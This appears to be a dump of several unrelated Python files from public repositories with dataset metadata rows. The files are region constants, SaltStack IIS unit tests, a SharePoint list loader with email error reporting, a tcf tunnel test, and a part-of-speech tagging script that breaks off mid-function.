ORSHANKA = 'Республика Марий Эл, Оршанский район'
PARANGA = 'Республика Марий Эл, Параньгинский район'
SERNUR = 'Республика Марий Эл, Сернурский район'
SOVETSKIY = 'Республика Марий Эл, Советский район'
YURINO = 'Республика Марий Эл, Юринский район'
ADMINISTRATIVE = [YOSHKAR_OLA, VOLZHSK, VOLZHSK_ADM, MOUNTIN, ZVENIGOVO, KILEMARY, KUZHENER, TUREK, MEDVEDEVO, MORKI, NEW_TORYAL, ORSHANKA, PARANGA, SERNUR, SOVETSKIY, YURINO]
# data indices
DATE = 0
TIME = 1
TYPE = 2
LOCATION = 3
STREET = 4
HOUSE_NUMBER = 5
ROAD = 6
KILOMETER = 7
METER = 8
LONGITUDE = 9
LATITUDE = 10
DEATH = 11
DEATH_CHILDREN = 12
INJURY = 13
INJURY_CHILDREN = 14
LONGITUDE_GEOCODE = 15
LATITUDE_GEOCODE = 16
VALID = 17
VALID_STRICT = 18
STREET_REPLACE_DICTIONARY = {
'Кырля': 'Кырли',
'Ленина пр-кт': 'Ленинский проспект',
'Ленина пл': 'Ленинский проспект',
'Л.Шевцовой': 'Шевцовой',
'Панфилова пер': 'Панфилова улица',
'Комсомольская пл': 'Комсомольская ул',
'Маркса пер': 'Маркса ул'
}
# coordinates grid borders
MARI_EL_WEST = 45.619745
MARI_EL_EAST = 50.200041
MARI_EL_SOUTH = 55.830512
MARI_EL_NORTH = 57.343631
YOSHKAR_OLA_WEST = 47.823484
YOSHKAR_OLA_EAST = 47.972560
YOSHKAR_OLA_SOUTH = 56.603073
YOSHKAR_OLA_NORTH = 56.669722
EARTH_MEAN_RADIUS = 6371000
MAX_DISTANCE = 150
# Yandex API constants
HOUSE_YANDEX = 'house'
| 26.849315
| 175
| 0.758673
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,626
| 0.615676
|
b29fec21f725de737210b497e78b6e2a1d2273be
| 7,195
|
py
|
Python
|
tests/unit/modules/win_iis_test.py
|
matt-malarkey/salt
|
c06860730d99e4f4941cbc164ee6db40157a07c9
|
[
"Apache-2.0"
] | 1
|
2018-09-19T22:42:54.000Z
|
2018-09-19T22:42:54.000Z
|
tests/unit/modules/win_iis_test.py
|
matt-malarkey/salt
|
c06860730d99e4f4941cbc164ee6db40157a07c9
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/modules/win_iis_test.py
|
matt-malarkey/salt
|
c06860730d99e4f4941cbc164ee6db40157a07c9
|
[
"Apache-2.0"
] | 1
|
2019-07-23T13:42:23.000Z
|
2019-07-23T13:42:23.000Z
|
# -*- coding: utf-8 -*-
'''
:synopsis: Unit Tests for Windows IIS Module 'module.win_iis'
:platform: Windows
:maturity: develop
versionadded:: Carbon
'''
# Import Python Libs
from __future__ import absolute_import
import json
# Import Salt Libs
from salt.exceptions import SaltInvocationError
from salt.modules import win_iis
# Import Salt Testing Libs
from salttesting import TestCase, skipIf
from salttesting.helpers import ensure_in_syspath
from salttesting.mock import (
MagicMock,
patch,
NO_MOCK,
NO_MOCK_REASON,
)
ensure_in_syspath('../../')
# Globals
win_iis.__salt__ = {}
# Make sure this module runs on Windows system
HAS_IIS = win_iis.__virtual__()
@skipIf(not HAS_IIS, 'This test case runs only on Windows systems')
@skipIf(NO_MOCK, NO_MOCK_REASON)
class WinIisTestCase(TestCase):
'''
Test cases for salt.modules.win_iis
'''
@patch('salt.modules.win_iis._srvmgr',
MagicMock(return_value={'retcode': 0}))
@patch('salt.modules.win_iis.list_apppools',
MagicMock(return_value=dict()))
def test_create_apppool(self):
'''
Test - Create an IIS application pool.
'''
with patch.dict(win_iis.__salt__):
self.assertTrue(win_iis.create_apppool('MyTestPool'))
@patch('salt.modules.win_iis._srvmgr',
MagicMock(return_value={
'retcode': 0,
'stdout': json.dumps([{'name': 'MyTestPool', 'state': 'Started',
'Applications': {'value': ['MyTestSite'],
'Count': 1}}])}))
def test_list_apppools(self):
'''
Test - List all configured IIS application pools.
'''
with patch.dict(win_iis.__salt__):
self.assertIsInstance(win_iis.list_apppools(), dict)
@patch('salt.modules.win_iis._srvmgr',
MagicMock(return_value={'retcode': 0}))
@patch('salt.modules.win_iis.list_apppools',
MagicMock(return_value={'MyTestPool': {
'applications': list(),
'state': 'Started'}}))
def test_remove_apppool(self):
'''
Test - Remove an IIS application pool.
'''
with patch.dict(win_iis.__salt__):
self.assertTrue(win_iis.remove_apppool('MyTestPool'))
@patch('salt.modules.win_iis._srvmgr',
MagicMock(return_value={'retcode': 0}))
def test_restart_apppool(self):
'''
Test - Restart an IIS application pool.
'''
with patch.dict(win_iis.__salt__):
self.assertTrue(win_iis.restart_apppool('MyTestPool'))
@patch('salt.modules.win_iis._srvmgr',
MagicMock(return_value={'retcode': 0}))
@patch('salt.modules.win_iis.list_sites',
MagicMock(return_value=dict()))
@patch('salt.modules.win_iis.list_apppools',
MagicMock(return_value=dict()))
def test_create_site(self):
'''
Test - Create a basic website in IIS.
'''
kwargs = {'name': 'MyTestSite', 'sourcepath': r'C:\inetpub\wwwroot',
'apppool': 'MyTestPool', 'hostheader': 'mytestsite.local',
'ipaddress': '*', 'port': 80, 'protocol': 'http'}
with patch.dict(win_iis.__salt__):
self.assertTrue(win_iis.create_site(**kwargs))
@patch('salt.modules.win_iis._srvmgr',
MagicMock(return_value={'retcode': 0}))
@patch('salt.modules.win_iis.list_sites',
MagicMock(return_value=dict()))
@patch('salt.modules.win_iis.list_apppools',
MagicMock(return_value=dict()))
def test_create_site_failed(self):
'''
Test - Create a basic website in IIS using invalid data.
'''
kwargs = {'name': 'MyTestSite', 'sourcepath': r'C:\inetpub\wwwroot',
'apppool': 'MyTestPool', 'hostheader': 'mytestsite.local',
'ipaddress': '*', 'port': 80, 'protocol': 'invalid-protocol-name'}
with patch.dict(win_iis.__salt__):
self.assertRaises(SaltInvocationError, win_iis.create_site, **kwargs)
@patch('salt.modules.win_iis._srvmgr',
MagicMock(return_value={'retcode': 0}))
@patch('salt.modules.win_iis.list_sites',
MagicMock(return_value={
'MyTestSite': {'apppool': 'MyTestPool',
'bindings': {'*:80:': {'certificatehash': None,
'certificatestorename': None,
'hostheader': None,
'ipaddress': '*', 'port': 80,
'protocol': 'http',
'sslflags': 0}},
'id': 1, 'sourcepath': r'C:\inetpub\wwwroot',
'state': 'Started'}}))
def test_remove_site(self):
'''
Test - Delete a website from IIS.
'''
with patch.dict(win_iis.__salt__):
self.assertTrue(win_iis.remove_site('MyTestSite'))
@patch('salt.modules.win_iis._srvmgr',
MagicMock(return_value={
'retcode': 0,
'stdout': json.dumps([{'applicationPool': 'MyTestPool',
'name': 'testApp', 'path': '/testApp',
'PhysicalPath': r'C:\inetpub\apps\testApp',
'preloadEnabled': False,
'protocols': 'http'}])}))
def test_list_apps(self):
'''
Test - Get all configured IIS applications for the specified site.
'''
with patch.dict(win_iis.__salt__):
self.assertIsInstance(win_iis.list_apps('MyTestSite'), dict)
@patch('salt.modules.win_iis.list_sites',
MagicMock(return_value={
'MyTestSite': {'apppool': 'MyTestPool',
'bindings': {'*:80:': {'certificatehash': None,
'certificatestorename': None,
'hostheader': None,
'ipaddress': '*', 'port': 80,
'protocol': 'http',
'sslflags': 0}},
'id': 1, 'sourcepath': r'C:\inetpub\wwwroot',
'state': 'Started'}}))
def test_list_bindings(self):
'''
Test - Get all configured IIS bindings for the specified site.
'''
with patch.dict(win_iis.__salt__):
self.assertIsInstance(win_iis.list_bindings('MyTestSite'), dict)
if __name__ == '__main__':
from integration import run_tests # pylint: disable=import-error
run_tests(WinIisTestCase, needs_daemon=False)
| 40.421348
| 88
| 0.522168
| 6,245
| 0.867964
| 0
| 0
| 6,346
| 0.882001
| 0
| 0
| 2,683
| 0.372898
|
b2a0afa260118cc81d83a6eee84100a7f5b452a7
| 6,217
|
py
|
Python
|
scripts/loader_to_sharepoint.py
|
lawrkelly/python-useful-scripts
|
dfa044049e41bd0faed96473a79b4a25e051c198
|
[
"MIT"
] | null | null | null |
scripts/loader_to_sharepoint.py
|
lawrkelly/python-useful-scripts
|
dfa044049e41bd0faed96473a79b4a25e051c198
|
[
"MIT"
] | 4
|
2020-09-18T09:58:14.000Z
|
2021-12-13T20:47:39.000Z
|
scripts/loader_to_sharepoint.py
|
lawrkelly/python-useful-scripts
|
dfa044049e41bd0faed96473a79b4a25e051c198
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# Loader_to_sharepoint.py
#
#
from pathlib import Path
import os.path
import requests,json,urllib
import pandas as pd
import collections
from collections import defaultdict
import xmltodict
import getpass
from shareplum import Office365
from shareplum.site import Version
from shareplum import Site
from requests_ntlm import HttpNtlmAuth
import smtplib
import email
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email import encoders
from email.mime.text import MIMEText
from email.message import EmailMessage
import pprint
# print("\nEnter Your MS ID: ")
MSID = input("\nEnter Your MS ID: ")
# print("\nEnter MS Password: ")
MSID_password = getpass.getpass("\nEnter MS Password: ")
url1="http://server.com/sites/Lists/MIA%20Testing/AllItems.aspx"
url2="http://server.com/sites/Lists/MIS%20MIA%20testing/AllItems.aspx"
head={'Accept': "application/json",'content-type': "application/json;odata=verbose", "X-HTTP-Method": "MERGE"}
# headers = {'Accept': "application/json",'content-type': "application/json;odata=verbose", 'X-RequestDigest': form_digest, "X-HTTP-Method": "MERGE"}
# "X-RequestDigest": digest_value}
##"DOMAIN\username",password
cred=HttpNtlmAuth(MSID, MSID_password)
#cred=HttpNtlmAuth("jsmith", "")
def decom_load():
# authcookie = Office365('https://jsmith.sharepoint.com/teams/project_name', username='jsmith@smith.com',
# password='').GetCookies()
# site365 = Site('https://company.sharepoint.com', version=Version.v2016, authcookie=authcookie)
# site365 = Site('https://company.sharepoint.com/teams/project', version=Version.v2016, authcookie=authcookie)
# site.AddList('decommission apps', description='Great List!', template_id='Custom List')
# try:
site = Site('http://server.com/sites/project', auth=cred)
sp_list = site.List("project apps")
sp_data = sp_list.GetListItems('All Items')
with open('output2.json', 'rb') as file1:
decom=json.load(file1)
all_decom=decom["decommRequests"]
update_data = []
pc_error_data = []
#cr="\n"
for decom_row in all_decom: # Getting each row data from the API file output2.json
decom_col=decom_row["Global ID"] # get the ID only
fields = ['ID','Global ID']
query = {'Where': [('Eq', 'Global ID', decom_col)]} # query amd fetch matching rows in the ED SHarepoint DB
spt_data = sp_list.GetListItems(fields=fields, query=query) # store matching records in SHAREPOINT
pd_data=""
pd_all_decom=pd.DataFrame(all_decom)
pd_data=pd.DataFrame(spt_data) ####. DATAFRAME OF MATCHING SHAREPOINT ###
for SP_id in spt_data: # SHAREPOINT ID matched
if SP_id['Global ID'] == decom_row["Global ID"]:
decom_row.update({"ID": SP_id['ID']})
update_data.append(decom_row)
sp_list.UpdateListItems(data=update_data, kind='Update')
print("updating:", SP_id['Global ID'])
if decom_row not in update_data:
print(decom_row)
new_records = []
new_records.append(decom_row)
#sp_list.UpdateListItems(data=new_records, kind='New')
try:
sp_list.UpdateListItems(data=new_records, kind='New')
except KeyError as e:
#PC_user=(decom_row["Primary Contact"])
pc_error_data.append(decom_row)
# pc_error_data.append(e.args)
#print(PC_user)
print(e.args)
#emailer(PC_user)
Path('/tmp/ifr.txt').touch()
#emailer(pc_error_data)
if os.path.isfile('/tmp/ifr.txt'):
print ("Incorrect records emailed")
emailer(pc_error_data)
os.remove("/tmp/ifr.txt")
else:
print ("No errors")
#except: #except OSError as e:
#print(e)
# print(PC_user)
#PC_user=decom_row["Primary Contact"]
#print(PC_user)
#emailer(PC_user)
# PC_user=decom_row["Primary Contact"]
def decom_update():
site = Site('http://server.com/sites/project', auth=cred)
sp_list = site.List("decommission apps")
id_var=input("Enter the global ID")
fields = ['ID', 'Global ID']
query = {'Where': [('Eq', 'Global ID', out)]}
sp_data = sp_list.GetListItems(fields=fields, query=query)
print(sp_data)
for i in sp_data:
print(i['ID'])
var1=i['ID']
print(var1)
var2='"ID":"'
print(var2)
var3='"'
print(var3)
row = var2 + var1 + var3
print(row)
def emailer(pc_error_data):
print("starting email")
msg = MIMEMultipart()
sender = "jsmith@smith.com"
recipients = "jsmith@smtih.com"
server=smtplib.SMTP('mailo2.server.com')
msg['Subject']=f'project loading issues'
msg['From']=sender
msg['To']=recipients
#form_ped=print(str(pc_error_data).strip('[]'))
#print(form_ped)
#pprint.pc_error_data
# Create the body of the message (a plain-text and an HTML version).
text =(f"Hi {MSID}, "
+"\n========================\n"
+f"loading issues encountered.\n"
+f"\n please investigate any issues.\n"
+f"\nWe found no record for the users ..\n"
+f"\n{pc_error_data}\n"
+f"\n in Sharepoint.\n"
+f"So most likely updates are required.")
part1 = MIMEText(text, 'plain')
msg.attach(part1)
server.sendmail(sender, recipients.split(","), msg.as_string())
server.quit()
print("completing email")
if __name__ == '__main__':
decom_load()
| 32.89418
| 149
| 0.579379
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,648
| 0.425929
|
b2a1766bc5fbc87d90f9559b3c26e49052f3b261
| 869
|
py
|
Python
|
tests/test_tunnels_released.py
|
jhaapako/tcf
|
ecd75404459c6fec9d9fa1522b70a8deab896644
|
[
"Apache-2.0"
] | 24
|
2018-08-21T18:04:48.000Z
|
2022-02-07T22:50:06.000Z
|
tests/test_tunnels_released.py
|
jhaapako/tcf
|
ecd75404459c6fec9d9fa1522b70a8deab896644
|
[
"Apache-2.0"
] | 16
|
2018-08-21T18:03:52.000Z
|
2022-03-01T17:15:42.000Z
|
tests/test_tunnels_released.py
|
jhaapako/tcf
|
ecd75404459c6fec9d9fa1522b70a8deab896644
|
[
"Apache-2.0"
] | 29
|
2018-08-22T19:40:59.000Z
|
2021-12-21T11:13:23.000Z
|
#! /usr/bin/python3
#
# Copyright (c) 2017 Intel Corporation
#
# SPDX-License-Identifier: Apache-2.0
#
# pylint: disable = missing-docstring
import os
import socket
import commonl.testing
import tcfl
import tcfl.tc
srcdir = os.path.dirname(__file__)
ttbd = commonl.testing.test_ttbd(config_files = [
# strip to remove the compiled/optimized version -> get source
os.path.join(srcdir, "conf_%s" % os.path.basename(__file__.rstrip('cd')))
])
@tcfl.tc.target(ttbd.url_spec)
class release_hooks(tcfl.tc.tc_c):
"""
We allocate a target, create tunnels and then we release it; when
released, the tunnels are destroyed.
"""
def eval(self, target):
target.tunnel.add(22, "127.0.0.1", 'tcp')
self.report_pass("release hooks were called on target release")
def teardown_90_scb(self):
ttbd.check_log_for_issues(self)
| 24.138889
| 77
| 0.700806
| 384
| 0.441887
| 0
| 0
| 415
| 0.47756
| 0
| 0
| 392
| 0.451093
|
b2a18a1d5893e676f4cfbf5555c659a91725ab53
| 52,309
|
py
|
Python
|
tagger-algo.py
|
li992/MAT
|
a5fb87b2d1ef667e5eb4a1c4e87caae6f1f75292
|
[
"Apache-2.0"
] | null | null | null |
tagger-algo.py
|
li992/MAT
|
a5fb87b2d1ef667e5eb4a1c4e87caae6f1f75292
|
[
"Apache-2.0"
] | null | null | null |
tagger-algo.py
|
li992/MAT
|
a5fb87b2d1ef667e5eb4a1c4e87caae6f1f75292
|
[
"Apache-2.0"
] | null | null | null |
import glob,os,stanza,argparse
from datetime import datetime
# route initiation
directory_path = os.getcwd()
#stanford tagger initiation
nlp = stanza.Pipeline('en')
dimDict ={}
# type specifiers
have = ["have","has","'ve","had","having","hath"]
do = ["do","does","did","doing","done"]
wp = ["who","whom","whose","which"]
be = ["be","am","is","are","was","were","been","being","'s","'m","'re"]
who = ["what","where","when","how","whether","why","whoever","whomever","whichever","wherever","whenever","whatever","however"]
preposition = ["against","amid","amidst","among","amongst","at","besides","between","by","despite","during","except","for","from","in","into","minus","notwithstanding","of","off","on","onto","opposite","out","per","plus","pro","than","through","throughout","thru","toward","towards","upon","versus","via","with","within","without"]
public = ["acknowledge","acknowledged","acknowledges","acknowledging","add","adds","adding","added","admit","admits","admitting","admitted","affirm","affirms","affirming","affirmed","agree","agrees","agreeing","agreed","allege","alleges","alleging","alleged","announce","announces","announcing","announced","argue","argues","arguing","argued","assert","asserts","asserting","asserted","bet","bets","betting","boast","boasts","boasting","boasted","certify","certifies","certifying","certified","claim","claims","claiming","claimed","comment","comments","commenting","commented","complain","complains","complaining","complained","concede","concedes","conceding","conceded","confess","confesses","confessing","confessed","confide","confides","confiding","confided","confirm","confirms","confirming","confirmed","contend","contends","contending","contended","convey","conveys","conveying","conveyed","declare","declares","declaring","declared","deny","denies","denying","denied","disclose","discloses","disclosing","disclosed","exclaim","exclaims","exclaiming","exclaimed","explain","explains","explaining","explained","forecast","forecasts","forecasting","forecasted","foretell","foretells","foretelling","foretold","guarantee","guarantees","guaranteeing","guaranteed","hint","hints","hinting","hinted","insist","insists","insisting","insisted","maintain","maintains","maintaining","maintained","mention","mentions","mentioning","mentioned","object","objects","objecting","objected","predict","predicts","predicting","predicted","proclaim","proclaims","proclaiming","proclaimed","promise","promises","promising","promised","pronounce","pronounces","pronouncing","pronounced","prophesy","prophesies","prophesying","prophesied","protest","protests","protesting","protested","remark","remarks","remarking","remarked","repeat","repeats","repeating","repeated","reply","replies","replying","replied","report","reports","reporting","reported","say","says","saying","said","state","states","stating","stated","submit","submits","submitting","submitted","suggest","suggests","suggesting","suggested","swear","swears","swearing","swore","sworn","testify","testifies","testifying","testified","vow","vows","vowing","vowed","warn","warns","warning","warned","write","writes","writing","wrote","written"]
private = ["accept","accepts","accepting","accepted","anticipate","anticipates","anticipating","anticipated","ascertain","ascertains","ascertaining","ascertained","assume","assumes","assuming","assumed","believe","believes","believing","believed","calculate","calculates","calculating","calculated","check","checks","checking","checked","conclude","concludes","concluding","concluded","conjecture","conjectures","conjecturing","conjectured","consider","considers","considering","considered","decide","decides","deciding","decided","deduce","deduces","deducing","deduced","deem","deems","deeming","deemed","demonstrate","demonstrates","demonstrating","demonstrated","determine","determines","determining","determined","discern","discerns","discerning","discerned","discover","discovers","discovering","discovered","doubt","doubts","doubting","doubted","dream","dreams","dreaming","dreamt","dreamed","ensure","ensures","ensuring","ensured","establish","establishes","establishing","established","estimate","estimates","estimating","estimated","expect","expects","expecting","expected","fancy","fancies","fancying","fancied","fear","fears","fearing","feared","feel","feels","feeling","felt","find","finds","finding","found","foresee","foresees","foreseeing","foresaw","forget","forgets","forgetting","forgot","forgotten","gather","gathers","gathering","gathered","guess","guesses","guessing","guessed","hear","hears","hearing","heard","hold","holds","holding","held","hope","hopes","hoping","hoped","imagine","imagines","imagining","imagined","imply","implies","implying","implied","indicate","indicates","indicating","indicated","infer","infers","inferring","inferred","insure","insures","insuring","insured","judge","judges","judging","judged","know","knows","knowing","knew","known","learn","learns","learning","learnt","learned","mean","means","meaning","meant","note","notes","noting","noted","notice","notices","noticing","noticed","observe","observes","observing","observed","perceive","perceives","perceiving","perceived","presume","presumes","presuming","presumed","presuppose","presupposes","presupposing","presupposed","pretend","pretend","pretending","pretended","prove","proves","proving","proved","realize","realise","realising","realizing","realises","realizes","realised","realized","reason","reasons","reasoning","reasoned","recall","recalls","recalling","recalled","reckon","reckons","reckoning","reckoned","recognize","recognise","recognizes","recognises","recognizing","recognising","recognized","recognised","reflect","reflects","reflecting","reflected","remember","remembers","remembering","remembered","reveal","reveals","revealing","revealed","see","sees","seeing","saw","seen","sense","senses","sensing","sensed","show","shows","showing","showed","shown","signify","signifies","signifying","signified","suppose","supposes","supposing","supposed","suspect","suspects","suspecting","suspected","think","thinks","thinking","thought","understand","understands","understanding","understood"]
suasive = ["agree","agrees","agreeing","agreed","allow","allows","allowing","allowed","arrange","arranges","arranging","arranged","ask","asks","asking","asked","beg","begs","begging","begged","command","commands","commanding","commanded","concede","concedes","conceding","conceded","decide","decides","deciding","decided","decree","decrees","decreeing","decreed","demand","demands","demanding","demanded","desire","desires","desiring","desired","determine","determines","determining","determined","enjoin","enjoins","enjoining","enjoined","ensure","ensures","ensuring","ensured","entreat","entreats","entreating","entreated","grant","grants","granting","granted","insist","insists","insisting","insisted","instruct","instructs","instructing","instructed","intend","intends","intending","intended","move","moves","moving","moved","ordain","ordains","ordaining","ordained","order","orders","ordering","ordered","pledge","pledges","pledging","pledged","pray","prays","praying","prayed","prefer","prefers","preferring","preferred","pronounce","pronounces","pronouncing","pronounced","propose","proposes","proposing","proposed","recommend","recommends","recommending","recommended","request","requests","requesting","requested","require","requires","requiring","required","resolve","resolves","resolving","resolved","rule","rules","ruling","ruled","stipulate","stipulates","stipulating","stipulated","suggest","suggests","suggesting","suggested","urge","urges","urging","urged","vote","votes","voting","voted"]
symbols = [",",".","!","@","#","$","%","^","&","*","(",")","<",">","/","?","{","}","[","]","\\","|","-","+","=","~","`"]
indefinitePN = ["anybody","anyone","anything","everybody","everyone","everything","nobody","none","nothing","nowhere","somebody","someone","something"]
quantifier = ["each","all","every","many","much","few","several","some","any"]
quantifierPN = ["everybody","somebody","anybody","everyone","someone","anyone","everything","something","anything"]
conjunctives = ["alternatively","consequently","conversely","eg","e.g.","furthermore","hence","however","i.e.","instead","likewise","moreover","namely","nevertheless","nonetheless","notwithstanding","otherwise","similarly","therefore","thus","viz."]
timeABV = ["afterwards","again","earlier","early","eventually","formerly","immediately","initially","instantly","late","lately","later","momentarily","now","nowadays","once","originally","presently","previously","recently","shortly","simultaneously","subsequently","today","to-day","tomorrow","to-morrow","tonight","to-night","yesterday"]
placeABV = ["aboard","above","abroad","across","ahead","alongside","around","ashore","astern","away","behind","below","beneath","beside","downhill","downstairs","downstream","east","far","hereabouts","indoors","inland","inshore","inside","locally","near","nearby","north","nowhere","outdoors","outside","overboard","overland","overseas","south","underfoot","underground","underneath","uphill","upstairs","upstream","west"]
narrative = ["ask","asks","asked","asking","tell","tells","told","telling"]
# tag specifiers
v = ["VBG","VBN","VB","VBD","VBP","VBZ"]
nn = ["NN","NNP","NNPS","NNS"]
def printWithTime(Strr):
now=datetime.now()
dt = now.strftime("%Y-%m-%d %H:%M:%S")
print(dt+" INFO: "+Strr)
def tagger(data,file,frags):
printWithTime(" Creating Stanford Tags....")
doc = nlp(data)
printWithTime(" Finished")
stftoutfilepath = os.path.join(directory_path,'Results')
tagoutfilepath = os.path.join(directory_path,'Results')
if frags == True:
stftoutfilepath = os.path.join(stftoutfilepath,'StanfordTagsFragment')
tagoutfilepath = os.path.join(tagoutfilepath,'ModifiedTagsFragment')
else:
stftoutfilepath = os.path.join(stftoutfilepath,'StanfordTags')
tagoutfilepath = os.path.join(tagoutfilepath,'ModifiedTags')
stftoutfilepath = os.path.join(stftoutfilepath,file)
tagoutfilepath = os.path.join(tagoutfilepath,file)
out = open(stftoutfilepath,'w')
dout = open(tagoutfilepath,'w')
printWithTime(" Generating Analyzed Tags...")
for i,sent in enumerate(doc.sentences):
linewords=[]
for word in sent.words:
outstr = f'{word.text}_{word.xpos}\n'
linewords.append(f'{word.text}_{word.xpos}')
out.write(outstr)
taglist = taggerAnalyzer(linewords)
for tags in taglist:
dout.write(tags+"\n")
printWithTime(" Finished")
out.close()
dout.close()
return
def getFinishedFiles(t):
returnList =[]
if t == "merged":
if not os.path.exists(os.path.join(directory_path,'mList.txt')):
return returnList
else:
path = os.path.join(directory_path,'mList.txt')
with open(path,'r') as infile:
for line in infile:
returnList.append(line.replace('\n',''))
return returnList
elif t == "fragment":
if not os.path.exists(os.path.join(directory_path,'fList.txt')):
return returnList
else:
path = os.path.join(directory_path,'fList.txt')
with open(path,'r') as infile:
for line in infile:
returnList.append(line.replace('\n',''))
return returnList
else:
return returnList
def MergedfolderProcess():
#print('folderprocess called')
if not os.path.exists('MergedFiles'):
printWithTime('Error: Please use FileMerger.py to generate file data first')
return []
else:
os.chdir(os.path.join(directory_path,'MergedFiles'))
filenames = glob.glob('*.txt')
validnames =[]
for name in filenames:
validnames.append(name)
#print(validnames)
return validnames
def FragmentfolderProcess():
if not os.path.exists('FileFragments'):
printWithTime('Error: Please use FileMerger.py to generate file data first')
return []
else:
os.chdir(os.path.join(directory_path,'FileFragments'))
filenames=glob.glob('*.txt')
validnames = []
for name in filenames:
validnames.append(name)
return validnames
def taggerAnalyzer(wordList):
#first loop to define prepositions
for i in range(len(wordList)):
word = wordList[i].split('_')
if i<len(wordList)-1:
next_word = wordList[i+1].split('_')
else:
next_word = ['','NULL']
if(word[0].lower()=="to" and (next_word[0] in wp or any(n in next_word for n in ["IN","CD","DT","JJ","PRPS","WPS","NN","NNP","PDT","PRP","WDT","WRB"]))):
wordList[i] = word[0] + "_PIN"
#second loop to define simple types
for i in range(len(wordList)):
word = wordList[i].split('_')
# negation
if("not" in word[0] or "n't" in word[0]) and "RB" in wordList[i]:
wordList[i] = word[0] + "_XX0"
# preposition
if word[0] in preposition:
wordList[i] = word[0] + "_PIN"
#indefinite pronouns
if word[0] in indefinitePN:
wordList[i] = word[0] + "_INPR"
#quantifier
if word[0] in quantifier:
wordList[i] = word[0] + "_QUAN"
#quantifier pronouns
if word[0] in quantifierPN:
wordList[i] = word[0] + "_QUPR"
# third loop to define complex types
for i in range(len(wordList)):
word = wordList[i].split('_')
if i<len(wordList)-4:
fourth_next_word = wordList[i+4].split('_')
else:
fourth_next_word = ['','NULL']
if i<len(wordList)-3:
third_next_word = wordList[i+3].split('_')
else:
third_next_word = ['','NULL']
if i<len(wordList)-2:
second_next_word = wordList[i+2].split('_')
else:
second_next_word = ['','NULL']
if i<len(wordList)-1:
next_word = wordList[i+1].split('_')
else:
next_word = ['','NULL']
if i>=1:
previous_word = wordList[i-1].split('_')
else:
previous_word = ['','NULL']
if i>=2:
second_previous_word = wordList[i-2].split('_')
else:
second_previous_word = ['','NULL']
if i>=3:
third_previous_word = wordList[i-3].split('_')
else:
third_previous_word = ['','NULL']
if i>=4:
fourth_previous_word = wordList[i-4].split('_')
else:
fourth_previous_word = ['','NULL']
if i>=5:
fifth_previous_word = wordList[i-5].split('_')
else:
fifth_previous_word = ['','NULL']
if i>=6:
sixth_previous_word = wordList[i-6].split('_')
else:
sixth_previous_word = ['','NULL']
#adverbial subordinators
if word[0].lower() in ["since","while","whilst","whereupon","whereas","whereby"]:
wordList[i]=wordList[i].replace(word[1],'OSUB')
word = wordList[i].split('_')
if (
(word[0].lower() == "such" and next_word[0].lower() == "that") or
(word[0].lower() == "inasmuch" and next_word[0].lower() == "as") or
(word[0].lower() == "forasmuch" and next_word[0].lower() == "as") or
(word[0].lower() == "insofar" and next_word[0].lower() == "as") or
(word[0].lower() == "insomuch" and next_word[0].lower() == "as") or
(word[0].lower() == "so" and next_word[0].lower() == "that" and any(n in second_next_word for n in ["NN","NNP","JJ"]))
):
wordList[i]=wordList[i].replace(word[1],'OSUB')
word = wordList[i].split('_')
wordList[i+1]=wordList[i+1].replace(next_word[1],"NULL")
next_word = wordList[i+1].split('_')
if ((word[0].lower() =="as") and (next_word[0].lower() in ["long","soon"]) and (second_next_word[0].lower() =="as")):
wordList[i]=wordList[i].replace(word[1],'OSUB')
word = wordList[i].split('_')
wordList[i+1]=wordList[i+1].replace(next_word[1],"NULL")
next_word = wordList[i+1].split('_')
wordList[i+2]=wordList[i+2].replace(second_next_word[1],"NULL")
second_next_word = wordList[i+2].split('_')
#predicative adjectives
if (word[0].lower() in be) and ("JJ" in next_word) and any(n in second_next_word for n in ["JJ","RB","NN","NNP"]):
wordList[i+1]=wordList[i+1].replace(next_word[1],'PRED')
next_word = wordList[i+1].split('_')
if (word[0].lower() in be) and ("RB" in next_word) and ("JJ" in second_next_word) and any(n in third_next_word for n in ["JJ","RB","NN","NNP"]):
wordList[i+2]=wordList[i+2].replace(second_next_word[1],'PRED')
second_next_word = wordList[i+2].split('_')
if (word[0].lower() in be) and ("XX0" in next_word) and ("JJ" in second_next_word) and any(n in third_next_word for n in ["JJ","RB","NN","NNP"]):
wordList[i+2]=wordList[i+2].replace(second_next_word[1],'PRED')
second_next_word = wordList[i+2].split('_')
if (word[0].lower() in be) and ("XX0" in next_word) and ("RB" in second_next_word) and ("JJ" in third_next_word) and any(n in fourth_next_word for n in ["JJ","RB","NN","NNP"]):
wordList[i+3]=wordList[i+3].replace(third_next_word[1],'PRED')
third_next_word = wordList[i+3].split('_')
if ("JJ" in word) and ("PHC" in previous_word) and ("PRED" in second_previous_word):
wordList[i]=wordList[i].replace(word[1],'PRED')
word = wordList[i].split('_')
#tags conjuncts
if (word[0].lower() in symbols and next_word[0].lower() in ["else","altogether","rather"]):
wordList[i+1]=wordList[i+1].replace(next_word[1],"CONJ")
next_word = wordList[i+1].split('_')
if word[0].lower() in conjunctives:
wordList[i]=wordList[i].replace(word[1],"CONJ")
word = wordList[i].split('_')
if ((word[0].lower()=="in" and next_word[0].lower() in ["comparison","contrast","particular","addition","conclusion","consequence","sum","summary"]) or
(word[0].lower()=="for" and next_word[0].lower() in ["example","instance"]) or
(word[0].lower()=="instead" and next_word[0].lower()=="of") or
(word[0].lower()=="by" and next_word[0].lower() in ["contrast","comparison"])):
wordList[i]=wordList[i].replace(word[1],"CONJ")
wordList[i+1]=wordList[i+1].replace(next_word[1],"NULL")
word = wordList[i].split('_')
next_word = wordList[i+1].split('_')
if((word[0].lower()=="in" and next_word[0].lower()=="any" and second_next_word[0].lower() in ["event","case"]) or
(word[0].lower()=="in" and next_word[0].lower()=="other" and second_next_word[0].lower()=="words") or
(word[0].lower()=="as" and next_word[0].lower()=="a" and second_next_word[0].lower() in ["consequence","result"]) or
(word[0].lower()=="on" and next_word[0].lower()=="the" and second_next_word[0].lower()=="contrary") ):
wordList[i]=wordList[i].replace(word[1],"CONJ")
wordList[i+1]=wordList[i+1].replace(next_word[1],"NULL")
wordList[i+2]=wordList[i+2].replace(second_next_word[1],"NULL")
word = wordList[i].split('_')
next_word = wordList[i+1].split('_')
second_next_word = wordList[i+2].split('_')
